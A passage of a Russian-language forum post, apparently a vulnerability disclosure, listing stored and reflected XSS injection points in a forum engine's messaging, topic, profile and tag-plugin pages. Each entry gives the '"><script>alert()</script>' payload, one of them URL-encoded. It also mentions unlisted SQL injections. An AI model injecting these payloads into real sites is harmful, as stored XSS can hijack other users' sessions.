/messenger.php?job=write
в модуле личных сообщений.
В поле "Содержание" пишем:
Цитата:
"><script>alert()</script>
и отправляем.
Активная xss:
/post.php?forumid=[number_forum]
при создании нового Топика.
В поле "Заголовок" пишем:
Цитата:
"><script>alert()</script>
и добавляем. Так же работает в поле "Описание".
Активная xss:
/profile.php
в Профиле. В полях:
-Номер MSN
-Подпись
-Домашняя страница
-Информация о себе
пишем
Цитата:
"><script>alert()</script>
. Будет видно при просмотре Тем с вашими сообщениями и у вас в профиле.
Пассивная xss:
http://localhost/plugins.php?p=tags&jinhua=&listby=&tagname=[tag]&forumid=[id]&page=%22%3E%3Cscript%3Ealert()%3C/script%3E
Так же в наличии несколько sql - инъекций, но на форуме их уже выкладывали.
Последний раз редактировалось Bb0y; 18.11.2009 в 14:40..
Причина: Поправка